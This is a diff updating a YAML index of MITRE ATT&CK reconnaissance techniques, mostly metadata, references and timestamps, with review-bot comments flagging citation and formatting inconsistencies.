url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55121,8 +55796,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -55150,7 +55823,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55166,33 +55839,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
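Review bot: the new AXFR paragraph in the T1590.002 description is preceded by an added blank line (`+` with no content), but the existing first and second paragraphs of the same `|-` block are not separated by one, so the rendered description will have uneven paragraph spacing; either add the missing blank line between the first two paragraphs or drop the new one. The comma change from `DNS, MX, TXT, and SPF records` to `DNS MX, TXT, and SPF records` reads as intended, and the `x_mitre_version` bump from `'1.1'` to `'1.2'` is consistent with a description change.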
@@ -55206,18 +55879,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
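Review bot: the added `DNS-CISA` reference dates the alert `(2016, September 29)` but its URL path is `news-events/alerts/2015/04/13/`, so either the description date or the link is wrong. The `Sean Metcalf Twitter DNS Records` reference also drops the `/photo/1` suffix when the host changes from `twitter.com` to `x.com`; confirm the shortened link still resolves to the image the citation is about, since the description text is unchanged.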
@@ -55238,7 +55922,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -55254,39 +55938,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
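Review bot: the T1594 description changes from the `|-` literal block used by every other entry to a double-quoted flow scalar with `\n\n` escapes, and the quoted string ends with a space before the closing quote (`Register Robots TXT 2015) "`), so the rendered description will carry trailing whitespace. That trailing space is most likely why the serialiser fell back to quoted style; stripping it from the source string should restore the block-literal form and keep the file consistent.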
@@ -55294,13 +55976,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -55325,7 +56035,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55341,8 +56051,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -55364,7 +56072,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55380,8 +56088,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -55407,7 +56113,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55425,13 +56131,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55487,7 +56191,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
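Review bot: the `ACSC Email Spoofing` reference swaps its URL for a `web.archive.org` snapshot but keeps `Retrieved October 19, 2020.`, while the `OPM Leak` reference later in this patch updates its retrieval date to September 16, 2024 when it moves to an archived copy. Pick one convention for archived links (keep the original retrieval date or update it to the date the snapshot was verified) and apply it to both.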
@@ -55538,7 +56242,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -55559,7 +56262,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55575,8 +56278,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -55598,7 +56299,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55614,8 +56315,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -55637,7 +56336,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55653,12 +56352,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55698,8 +56395,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -55744,11 +56441,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55788,9 +56484,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55852,7 +56547,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
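Review bot: T1596 loses `spec_version: '2.1'` but keeps `x_mitre_attack_spec_version: 2.1.0`, and the same happens for T1589.002 (2.1.0) and T1598.004 (3.1.0) further down, while other objects in this patch are bumped to 3.2.0. If the mixed versions simply mirror the source bundle they are expected; if the intent was to normalise the index to one attack spec version, these entries were missed.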
@@ -55878,7 +56572,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55899,8 +56593,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55965,7 +56657,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -56013,7 +56704,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -56035,7 +56725,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -56051,34 +56741,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56087,15 +56753,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
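Review bot: the `SecurityTrails Google Hacking` reference now points at `https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks`, but its description still credits `Borges, E. (2019, March 5). Exploring Google Hacking Techniques`, so the author, date and title no longer describe the linked page. Either cite the Recorded Future page with its own author and date, or keep the original SecurityTrails citation and point it at a `web.archive.org` snapshot, as this patch already does for other dead links.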
@@ -56117,7 +56806,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
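Review bot: the `modified` timestamp goes backwards here, from 2022-04-25 to 2021-04-15, and the same regression appears on T1592.004, T1596.004, T1591, T1590, T1592.003, T1592.002, T1593.001, T1591.004 and T1595.003 further down. The old value `2022-04-25T14:00:00.188Z` is byte-identical across all of them, which looks like a bulk stamp rather than a real edit time, so the new per-object values are plausibly the authoritative upstream ones; still, say so in the commit message, and check that nothing downstream uses `modified` as a "newer wins" key, because such a consumer will now treat these entries as older than what it already holds.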
@@ -56133,8 +56822,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
